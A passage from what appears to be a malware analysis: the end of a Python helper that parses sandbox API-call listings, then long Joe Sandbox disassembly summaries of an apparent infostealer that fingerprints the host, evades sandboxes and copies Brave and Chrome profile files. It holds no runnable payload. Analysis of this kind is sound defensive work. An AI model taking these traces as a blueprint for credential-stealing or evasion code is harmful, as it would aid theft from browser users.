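                      "args": args, "ref": int(m.group("ref"), 16)})
    return calls


def import_resolution_summary(calls):
    """Per module handle: export names rendered as strings vs. hex-only arguments.

    A hex-only second argument means the report rendered no string there; in
    this sample that is read (assumption) as a name built at run time, which is
    what keeps the import out of the PE import table."""
    summary = defaultdict(lambda: {"plaintext": [], "pointer_only": 0})
    for c in calls:
        if c["func"] != "GetProcAddress" or len(c["args"]) < 2:
            continue
        handle, name = c["args"][0], c["args"][1]
        if HEX_RE.match(name):
            summary[handle]["pointer_only"] += 1
        else:
            summary[handle]["plaintext"].append(name)
    return dict(summary)


def wininet_get_chain(calls):
    """Check the WinInet call order and whether security flags are set pre-send."""
    seq = [c for c in calls if c["module"] == "WININET"]
    names = [c["func"] for c in seq]
    required = ["InternetOpenA", "InternetConnectA", "HttpOpenRequestA", "HttpSendRequestA"]
    pos = 0  # ordered-subsequence match
    for n in names:
        if pos < len(required) and n == required[pos]:
            pos += 1
    send_idx = names.index("HttpSendRequestA") if "HttpSendRequestA" in names else len(names)
    sets_flags = any(c["func"] == "InternetSetOptionA" and len(c["args"]) > 1
                     and _hex(c["args"][1]) == INTERNET_OPTION_SECURITY_FLAGS
                     for c in seq[:send_idx])
    queries_status = any(c["func"] == "HttpQueryInfoA" and len(c["args"]) > 1
                         and _hex(c["args"][1]) == HTTP_QUERY_STATUS_CODE for c in seq)
    method = next((c["args"][1] for c in seq if c["func"] == "HttpOpenRequestA"), None)
    return {"complete_get_chain": pos == len(required), "method": method,
            "sets_security_flags": sets_flags, "queries_status_code": queries_status,
            "sequence": names}


if __name__ == "__main__":
    parsed = parse_listing(SAMPLE)
    print(import_resolution_summary(parsed))
    print(wininet_get_chain(parsed))
```

Run against the full "APIs" lists rather than the excerpt to get real counts per module handle; the handles (76910000, 6F4E0000, ...) are the LoadLibraryA return values for this run and change between executions, so key any saved results on the names, not the handles.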
                                APIs
                                • lstrlen.KERNEL32(00F654C8), ref: 003AF315
                                • lstrcpy.KERNEL32(00000000,?), ref: 003AF3A3
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 003AF3C7
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 003AF47B
                                • lstrcpy.KERNEL32(00000000,00F654C8), ref: 003AF4BB
                                • lstrcpy.KERNEL32(00000000,00F789C8), ref: 003AF4EA
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 003AF59E
                                • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 003AF61C
                                • lstrcpy.KERNEL32(00000000,?), ref: 003AF64C
                                • lstrcpy.KERNEL32(00000000,?), ref: 003AF69A
                                • StrCmpCA.SHLWAPI(?,ERROR), ref: 003AF718
                                • lstrlen.KERNEL32(00F78A88), ref: 003AF746
                                • lstrcpy.KERNEL32(00000000,00F78A88), ref: 003AF771
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 003AF793
                                • lstrcpy.KERNEL32(00000000,?), ref: 003AF7E4
                                • StrCmpCA.SHLWAPI(?,ERROR), ref: 003AFA32
                                • lstrlen.KERNEL32(00F78958), ref: 003AFA60
                                • lstrcpy.KERNEL32(00000000,00F78958), ref: 003AFA8B
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 003AFAAD
                                • lstrcpy.KERNEL32(00000000,?), ref: 003AFAFE
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2325073043.0000000000391000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_390000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrlen
                                • String ID: ERROR
                                • API String ID: 367037083-2861137601
                                • Opcode ID: a09326d384c1f990cec498d5d537d0d29ca44fc91c6151dcbe19d1197b4f8986
                                • Instruction ID: f095f7110ca07cda006a4c8cedfd58fe3c3bdb4c0ec5f536e739f26190f051d4
                                • Opcode Fuzzy Hash: a09326d384c1f990cec498d5d537d0d29ca44fc91c6151dcbe19d1197b4f8986
                                • Instruction Fuzzy Hash: 5AF12B70A01602CFCB26DFA9C848A6AB7F5FF55314B1A81BDD4099B2A1D736DC46CB90

                                Control-flow Graph

                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2325073043.0000000000391000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_390000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: ExitProcess
                                • String ID: block
                                • API String ID: 621844428-2199623458
                                • Opcode ID: 1f993c23bdba283c8a78738cb9ef7f2d69bd035e4f263b350f5a42409f4e3d40
                                • Instruction ID: ceaccbe4594265aa5eef4c17cbda29794627e1dbbfb986500b80e5052f78a32d
                                • Opcode Fuzzy Hash: 1f993c23bdba283c8a78738cb9ef7f2d69bd035e4f263b350f5a42409f4e3d40
                                • Instruction Fuzzy Hash: EC517FB1A04B01EFCB229F75DC8CEAB7BF8FB15700B10481DE442D6610DB74D9459BA1

                                Control-flow Graph

                                APIs
                                • GetWindowsDirectoryA.KERNEL32(00000000,00000104,00000000,00000000,00000000), ref: 003B277B
                                • GetVolumeInformationA.KERNEL32(?,00000000,00000000,003A93B6,00000000,00000000,00000000,00000000), ref: 003B27AC
                                • GetProcessHeap.KERNEL32(00000000,00000104), ref: 003B280F
                                • RtlAllocateHeap.NTDLL(00000000), ref: 003B2816
                                • wsprintfA.USER32 ref: 003B283B
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2325073043.0000000000391000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_390000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateDirectoryInformationProcessVolumeWindowswsprintf
                                • String ID: :\$C
                                • API String ID: 2572753744-3309953409
                                • Opcode ID: f508c66b1a9937da12302cf8f88a6a79870f80b4af132aa4d772bbe447a7ab82
                                • Instruction ID: 09296c0490717566420218e3e72328f127d01a86ac434bbd3c7aa25c8eac9feb
                                • Opcode Fuzzy Hash: f508c66b1a9937da12302cf8f88a6a79870f80b4af132aa4d772bbe447a7ab82
                                • Instruction Fuzzy Hash: 613170B1D082099FCB05CFB889899EFBFBCEF58714F100169E605F7650E6349A408BA5

                                Control-flow Graph

                                APIs
                                • ??2@YAPAXI@Z.MSVCRT(00000800,?), ref: 00394BF7
                                • ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00394C01
                                • ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00394C0B
                                • lstrlen.KERNEL32(?,00000000,?), ref: 00394C1F
                                • InternetCrackUrlA.WININET(?,00000000), ref: 00394C27
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2325073043.0000000000391000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_390000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: ??2@$CrackInternetlstrlen
                                • String ID: <
                                • API String ID: 1683549937-4251816714
                                • Opcode ID: af3d2f69d29b8903b705c8f3a1191530871d1e9309cbf9542bfe8499bf25138c
                                • Instruction ID: 8a7d6a641b0e096cf79eebf5dcd3da70bf3e55bf52ca2a3a9dac998865c28d12
                                • Opcode Fuzzy Hash: af3d2f69d29b8903b705c8f3a1191530871d1e9309cbf9542bfe8499bf25138c
                                • Instruction Fuzzy Hash: 49011B71D00218AFDB10DFA8E845B9EBBA8AB18324F00416AF954E7290EB7459058BD4

                                Control-flow Graph

                                APIs
                                • GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 00391046
                                • VirtualAllocExNuma.KERNEL32(00000000), ref: 0039104D
                                • ExitProcess.KERNEL32 ref: 00391058
                                • VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004), ref: 0039106C
                                • VirtualFree.KERNEL32(00000000,17C841C0,00008000), ref: 003910AB
                                Memory Dump Source
                                • Source File: 00000000.00000002.2325073043.0000000000391000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_390000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Virtual$AllocProcess$CurrentExitFreeNuma
                                • String ID:
                                • API String ID: 3477276466-0
                                • Opcode ID: ee78181e01df00251870ca690b26d6e012b73cc241c9e8db04e736f2182b7131
                                • Instruction ID: 91e0d5a3d5508656af8e3fbc2c3915dd4a6fbf71f7478b4d903b8c7a5f424f66
                                • Opcode Fuzzy Hash: ee78181e01df00251870ca690b26d6e012b73cc241c9e8db04e736f2182b7131
                                • Instruction Fuzzy Hash: 6301F471780204BFEB204A656C1EF6B7BADA794B05F208018F708F73C0D9B2E904A664

                                Control-flow Graph

                                APIs
                                • lstrcpy.KERNEL32(00000000,?), ref: 003AEEC3
                                • StrCmpCA.SHLWAPI(?,ERROR), ref: 003AEEDE
                                • lstrcpy.KERNEL32(00000000,ERROR), ref: 003AEF3F
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2325073043.0000000000391000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_390000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy
                                • String ID: ERROR
                                • API String ID: 3722407311-2861137601
                                • Opcode ID: 143ea4590529aaeb12248a7ca2ca460ac6ac35602fbf7675527eff238592b93e
                                • Instruction ID: c425b5ea538a1cc0520abeefedd45a324ad7f0652d599a4f2ebf2c9ea4764161
                                • Opcode Fuzzy Hash: 143ea4590529aaeb12248a7ca2ca460ac6ac35602fbf7675527eff238592b93e
                                • Instruction Fuzzy Hash: 1221FF31621606AFCF27BF79D84AA9F37A4EF11300F055428B84ADF252DE30DC248794

                                Control-flow Graph

                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2325073043.0000000000391000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_390000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: ExitGlobalMemoryProcessStatus
                                • String ID: @
                                • API String ID: 803317263-2766056989
                                • Opcode ID: 81c4d24e50e58d8ac3ebda2b0a61026443310a6d46112cc17837bc89f375ba48
                                • Instruction ID: 9b385c6f48681c46c23bde60d4bf7679efdcc65c78e5f80f2798b4ca10fb0634
                                • Opcode Fuzzy Hash: 81c4d24e50e58d8ac3ebda2b0a61026443310a6d46112cc17837bc89f375ba48
                                • Instruction Fuzzy Hash: 61F05C701183476BEF516A64DC0E72FF7D8EB10350F100929DE9BE2280E230C840D127

                                Control-flow Graph

                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2325073043.0000000000391000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_390000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: ExitProcess
                                • String ID: block
                                • API String ID: 621844428-2199623458
                                • Opcode ID: d8f086fb5b71e735444fb5a8c4264d334845832f2b8d107963d6b4d6bc61ae2f
                                • Instruction ID: 49e27ab6be9d79dbe844e9ec9b6a8c83e72dba8ea5662480c53fe2cd5f4451f3
                                • Opcode Fuzzy Hash: d8f086fb5b71e735444fb5a8c4264d334845832f2b8d107963d6b4d6bc61ae2f
                                • Instruction Fuzzy Hash: 74E0922940424AEFC7119FB98C6CD82FBA9EF5A300B450999E6006F650D630FC85D7A6

                                Control-flow Graph

                                control_flow_graph 2957 3b2ad0-3b2b22 GetProcessHeap RtlAllocateHeap GetComputerNameA 2958 3b2b44-3b2b59 2957->2958 2959 3b2b24-3b2b36 2957->2959
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,00000104,00000000,00000000,?), ref: 003B2AFF
                                • RtlAllocateHeap.NTDLL(00000000), ref: 003B2B06
                                • GetComputerNameA.KERNEL32(00000000,00000104), ref: 003B2B1A
                                Similarity
                                • API ID: Heap$AllocateComputerNameProcess
                                • String ID:
                                • API String ID: 1664310425-0
                                • Opcode ID: b0b27ce8b3439c12b7c334b82d0545673f64d4bdc781f87e9a5fd5b81294d671
                                • Instruction ID: 325ce86a65605f4903ea1a465e65fe4d29faa76375e27547d0ad693a06032e46
                                • Opcode Fuzzy Hash: b0b27ce8b3439c12b7c334b82d0545673f64d4bdc781f87e9a5fd5b81294d671
                                • Instruction Fuzzy Hash: 6001D676A44608AFC710CF99EC49BDEF7B8F744B21F00026AFA19E3780D774590487A1
                                APIs
                                • GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 00391046
                                • VirtualAllocExNuma.KERNEL32(00000000), ref: 0039104D
                                • ExitProcess.KERNEL32 ref: 00391058
                                • VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004), ref: 0039106C
                                • VirtualFree.KERNEL32(00000000,17C841C0,00008000), ref: 003910AB
                                Similarity
                                • API ID: Virtual$AllocProcess$CurrentExitFreeNuma
                                • String ID:
                                • API String ID: 3477276466-0
                                • Opcode ID: cf0bb41e89ac9e73a50165e4c40e089c5e8a1319048d7c46a22c19a80780a4ee
                                • Instruction ID: 5fb8650d64a7433bd10965f34c9240f99d74fbe47c1f8b86c63a6a1ab4ea98d3
                                • Opcode Fuzzy Hash: cf0bb41e89ac9e73a50165e4c40e089c5e8a1319048d7c46a22c19a80780a4ee
                                • Instruction Fuzzy Hash: 73E0EC70248345BFE62157A59C8EF167FACAF52B01F144845F205FB0D1D6A5B404EB65
                                APIs
                                • lstrcpy.KERNEL32(00000000,003BCFEC), ref: 003A23D4
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 003A23F7
                                • lstrcat.KERNEL32(00000000,00000000), ref: 003A2402
                                • lstrlen.KERNEL32(\*.*), ref: 003A240D
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 003A242A
                                • lstrcat.KERNEL32(00000000,\*.*), ref: 003A2436
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 003A246A
                                • FindFirstFileA.KERNEL32(00000000,?), ref: 003A2486
                                Strings
                                Similarity
                                • API ID: lstrcpy$lstrcat$FileFindFirstlstrlen
                                • String ID: \*.*
                                • API String ID: 2567437900-1173974218
                                • Opcode ID: edb46d11f75c52f09b0e5dad67d5396f5e3f116188ae81548e95c65df9150f3d
                                • Instruction ID: 4accb0b2269c2a90400a434b90588b3556c206969f4d8b6ac51be5658c7b14bf
                                • Opcode Fuzzy Hash: edb46d11f75c52f09b0e5dad67d5396f5e3f116188ae81548e95c65df9150f3d
                                • Instruction Fuzzy Hash: 4BA25C31912A16AFCB22AF69DC89EAF77B9EF15700F064168F806E7251DB34DD05CB90
                                APIs
                                • lstrcpy.KERNEL32(00000000,003BCFEC), ref: 003916E2
                                • lstrcpy.KERNEL32(00000000,003BCFEC), ref: 00391719
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 0039176C
                                • lstrcat.KERNEL32(00000000), ref: 00391776
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 003917A2
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 003917EF
                                • lstrcat.KERNEL32(00000000,00000000), ref: 003917F9
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00391825
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00391875
                                • lstrcat.KERNEL32(00000000), ref: 0039187F
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 003918AB
                                • lstrcpy.KERNEL32(00000000,?), ref: 003918F3
                                • lstrcat.KERNEL32(00000000,00000000), ref: 003918FE
                                • lstrlen.KERNEL32(003C1794), ref: 00391909
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00391929
                                • lstrcat.KERNEL32(00000000,003C1794), ref: 00391935
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 0039195B
                                • lstrcat.KERNEL32(00000000,00000000), ref: 00391966
                                • lstrlen.KERNEL32(\*.*), ref: 00391971
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 0039198E
                                • lstrcat.KERNEL32(00000000,\*.*), ref: 0039199A
                                  • Part of subcall function 003B4040: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,00000000), ref: 003B406D
                                  • Part of subcall function 003B4040: lstrcpy.KERNEL32(00000000,?), ref: 003B40A2
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 003919C3
                                • lstrcpy.KERNEL32(00000000,?), ref: 00391A0E
                                • lstrcat.KERNEL32(00000000,00000000), ref: 00391A16
                                • lstrlen.KERNEL32(003C1794), ref: 00391A21
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00391A41
                                • lstrcat.KERNEL32(00000000,003C1794), ref: 00391A4D
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00391A76
                                • lstrcat.KERNEL32(00000000,00000000), ref: 00391A81
                                • lstrlen.KERNEL32(003C1794), ref: 00391A8C
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00391AAC
                                • lstrcat.KERNEL32(00000000,003C1794), ref: 00391AB8
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00391ADE
                                • lstrcat.KERNEL32(00000000,00000000), ref: 00391AE9
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00391B11
                                • FindFirstFileA.KERNEL32(00000000,?), ref: 00391B45
                                • StrCmpCA.SHLWAPI(?,003C17A0), ref: 00391B70
                                • StrCmpCA.SHLWAPI(?,003C17A4), ref: 00391B8A
                                • lstrcpy.KERNEL32(00000000,003BCFEC), ref: 00391BC4
                                • lstrcpy.KERNEL32(00000000,?), ref: 00391BFB
                                • lstrcat.KERNEL32(00000000,00000000), ref: 00391C03
                                • lstrlen.KERNEL32(003C1794), ref: 00391C0E
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00391C31
                                • lstrcat.KERNEL32(00000000,003C1794), ref: 00391C3D
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00391C69
                                • lstrcat.KERNEL32(00000000,00000000), ref: 00391C74
                                • lstrlen.KERNEL32(003C1794), ref: 00391C7F
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00391CA2
                                • lstrcat.KERNEL32(00000000,003C1794), ref: 00391CAE
                                • lstrlen.KERNEL32(?), ref: 00391CBB
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00391CDB
                                • lstrcat.KERNEL32(00000000,?), ref: 00391CE9
                                • lstrlen.KERNEL32(003C1794), ref: 00391CF4
                                • lstrcpy.KERNEL32(00000000,?), ref: 00391D14
                                • lstrcat.KERNEL32(00000000,003C1794), ref: 00391D20
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00391D46
                                • lstrcat.KERNEL32(00000000,00000000), ref: 00391D51
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00391D7D
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00391DE0
                                • lstrcat.KERNEL32(00000000,00000000), ref: 00391DEB
                                • lstrlen.KERNEL32(003C1794), ref: 00391DF6
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00391E19
                                • lstrcat.KERNEL32(00000000,003C1794), ref: 00391E25
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00391E4B
                                • lstrcat.KERNEL32(00000000,00000000), ref: 00391E56
                                • lstrlen.KERNEL32(003C1794), ref: 00391E61
                                • lstrcpy.KERNEL32(00000000,?), ref: 00391E81
                                • lstrcat.KERNEL32(00000000,003C1794), ref: 00391E8D
                                • lstrlen.KERNEL32(?), ref: 00391E9A
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00391EBA
                                • lstrcat.KERNEL32(00000000,?), ref: 00391EC8
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00391EF4
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00391F3E
                                • GetFileAttributesA.KERNEL32(00000000), ref: 00391F45
                                • lstrcpy.KERNEL32(00000000,003BCFEC), ref: 00391F9F
                                • lstrlen.KERNEL32(00F78C18), ref: 00391FAE
                                • lstrcpy.KERNEL32(00000000,?), ref: 00391FDB
                                • lstrcat.KERNEL32(00000000,?), ref: 00391FE3
                                • lstrlen.KERNEL32(003C1794), ref: 00391FEE
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 0039200E
                                • lstrcat.KERNEL32(00000000,003C1794), ref: 0039201A
                                • lstrcpy.KERNEL32(00000000,?), ref: 00392042
                                • lstrcat.KERNEL32(00000000,00000000), ref: 0039204D
                                • lstrlen.KERNEL32(003C1794), ref: 00392058
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00392075
                                • lstrcat.KERNEL32(00000000,003C1794), ref: 00392081
                                Strings
                                Similarity
                                • API ID: lstrcpy$lstrcat$lstrlen$File$AttributesFindFirstFolderPath
                                • String ID: \*.*
                                • API String ID: 4127656590-1173974218
                                • Opcode ID: 14fada988c1e13469dc93ac90d93506d3651ef2fe4b47f4be73e7691171b6cf8
                                • Instruction ID: dd5b51f2e0ed7f9c1e467a6ba917308ba3be589c513f201c384b9c29a1afc4e0
                                • Opcode Fuzzy Hash: 14fada988c1e13469dc93ac90d93506d3651ef2fe4b47f4be73e7691171b6cf8
                                • Instruction Fuzzy Hash: 56925B31912A1BAFCF23AFA4DD89EAF77B9AF54700F054124F805AB251DB349D15CBA0
                                APIs
                                • lstrcpy.KERNEL32(00000000,003BCFEC), ref: 0039DBC1
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 0039DBE4
                                • lstrcat.KERNEL32(00000000,00000000), ref: 0039DBEF
                                • lstrlen.KERNEL32(003C4CA8), ref: 0039DBFA
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 0039DC17
                                • lstrcat.KERNEL32(00000000,003C4CA8), ref: 0039DC23
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 0039DC4C
                                • lstrcpy.KERNEL32(00000000,003BCFEC), ref: 0039DC8F
                                • lstrcpy.KERNEL32(00000000,003BCFEC), ref: 0039DCBF
                                • FindFirstFileA.KERNEL32(00000000,?), ref: 0039DCD0
                                • StrCmpCA.SHLWAPI(?,003C17A0), ref: 0039DCF0
                                • StrCmpCA.SHLWAPI(?,003C17A4), ref: 0039DD0A
                                • lstrlen.KERNEL32(003BCFEC), ref: 0039DD1D
                                • lstrcpy.KERNEL32(00000000,003BCFEC), ref: 0039DD47
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 0039DD70
                                • lstrcat.KERNEL32(00000000,00000000), ref: 0039DD7B
                                • lstrlen.KERNEL32(003C1794), ref: 0039DD86
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 0039DDA3
                                • lstrcat.KERNEL32(00000000,003C1794), ref: 0039DDAF
                                • lstrlen.KERNEL32(?), ref: 0039DDBC
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 0039DDDF
                                • lstrcat.KERNEL32(00000000,?), ref: 0039DDED
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 0039DE19
                                • lstrlen.KERNEL32(003C1794), ref: 0039DE3D
                                • lstrcpy.KERNEL32(00000000,?), ref: 0039DE6F
                                • lstrcat.KERNEL32(00000000,003C1794), ref: 0039DE7B
                                • lstrlen.KERNEL32(00F788B8), ref: 0039DE8A
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 0039DEB0
                                • lstrcat.KERNEL32(00000000,00000000), ref: 0039DEBB
                                • lstrlen.KERNEL32(003C1794), ref: 0039DEC6
                                • lstrcpy.KERNEL32(00000000,?), ref: 0039DEE6
                                • lstrcat.KERNEL32(00000000,003C1794), ref: 0039DEF2
                                • lstrlen.KERNEL32(00F78BB8), ref: 0039DF01
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 0039DF27
                                • lstrcat.KERNEL32(00000000,00000000), ref: 0039DF32
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 0039DF5E
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 0039DFA5
                                • lstrcat.KERNEL32(00000000,003C1794), ref: 0039DFB1
                                • lstrlen.KERNEL32(00F788B8), ref: 0039DFC0
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 0039DFE9
                                • lstrcat.KERNEL32(00000000,00000000), ref: 0039DFF4
                                • lstrlen.KERNEL32(003C1794), ref: 0039DFFF
                                • lstrcpy.KERNEL32(00000000,?), ref: 0039E022
                                • lstrcat.KERNEL32(00000000,003C1794), ref: 0039E02E
                                • lstrlen.KERNEL32(00F78BB8), ref: 0039E03D
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 0039E063
                                • lstrcat.KERNEL32(00000000,00000000), ref: 0039E06E
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 0039E09A
                                • StrCmpCA.SHLWAPI(?,Brave), ref: 0039E0CD
                                • StrCmpCA.SHLWAPI(?,Preferences), ref: 0039E0E7
                                • lstrcpy.KERNEL32(00000000,003BCFEC), ref: 0039E11F
                                • lstrlen.KERNEL32(00F7DD38), ref: 0039E12E
                                • lstrcpy.KERNEL32(00000000,?), ref: 0039E155
                                • lstrcat.KERNEL32(00000000,?), ref: 0039E15D
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 0039E19F
                                • lstrcat.KERNEL32(00000000), ref: 0039E1A9
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 0039E1D0
                                • CopyFileA.KERNEL32(00000000,?,00000001), ref: 0039E1F9
                                • lstrcpy.KERNEL32(00000000,003BCFEC), ref: 0039E22F
                                • lstrlen.KERNEL32(00F78C18), ref: 0039E23D
                                • lstrcpy.KERNEL32(00000000,?), ref: 0039E261
                                • lstrcat.KERNEL32(00000000,00F78C18), ref: 0039E269
                                • lstrlen.KERNEL32(\Brave\Preferences), ref: 0039E274
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 0039E29B
                                • lstrcat.KERNEL32(00000000,\Brave\Preferences), ref: 0039E2A7
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 0039E2CF
                                • lstrcpy.KERNEL32(00000000,?), ref: 0039E30F
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 0039E349
                                • DeleteFileA.KERNEL32(?), ref: 0039E381
                                • StrCmpCA.SHLWAPI(?,00F7DE10), ref: 0039E3AB
                                • lstrcpy.KERNEL32(00000000,?), ref: 0039E3F4
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 0039E41C
                                • lstrcpy.KERNEL32(00000000,?), ref: 0039E445
                                • StrCmpCA.SHLWAPI(?,00F78BB8), ref: 0039E468
                                • StrCmpCA.SHLWAPI(?,00F788B8), ref: 0039E47D
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 0039E4D9
                                • GetFileAttributesA.KERNEL32(00000000), ref: 0039E4E0
                                • StrCmpCA.SHLWAPI(?,00F7DC60), ref: 0039E58E
                                • lstrcpy.KERNEL32(00000000,003BCFEC), ref: 0039E5C4
                                • CopyFileA.KERNEL32(00000000,?,00000001), ref: 0039E639
                                • lstrcpy.KERNEL32(00000000,?), ref: 0039E678
                                • lstrcpy.KERNEL32(00000000,?), ref: 0039E6A1
                                • lstrcpy.KERNEL32(00000000,?), ref: 0039E6C7
                                • lstrcpy.KERNEL32(00000000,?), ref: 0039E70E
                                • lstrcpy.KERNEL32(00000000,?), ref: 0039E737
                                • lstrcpy.KERNEL32(00000000,?), ref: 0039E75C
                                • StrCmpCA.SHLWAPI(?,Google Chrome), ref: 0039E776
                                • DeleteFileA.KERNEL32(?), ref: 0039E7D2
                                • StrCmpCA.SHLWAPI(?,00F78AA8), ref: 0039E7FC
                                • lstrcpy.KERNEL32(00000000,?), ref: 0039E88C
                                • lstrcpy.KERNEL32(00000000,?), ref: 0039E8B5
                                • lstrcpy.KERNEL32(00000000,?), ref: 0039E8EE
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 0039E916
                                • lstrcpy.KERNEL32(00000000,?), ref: 0039E952
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2325073043.0000000000391000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
• Associated: 00000000.00000002.2325048970.0000000000390000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2325073043.00000000003C7000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2325073043.000000000041E000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2325073043.0000000000426000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2325073043.000000000043F000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2325073043.00000000005C8000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2325256322.00000000005DA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2325274343.00000000005DC000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2325274343.000000000075C000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2325274343.0000000000840000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2325274343.000000000086A000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2325274343.0000000000872000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2325274343.0000000000882000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2325550913.0000000000883000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2325675684.0000000000A1F000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2325694941.0000000000A20000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_390000_file.jbxd
                                Yara matches
                                Similarity
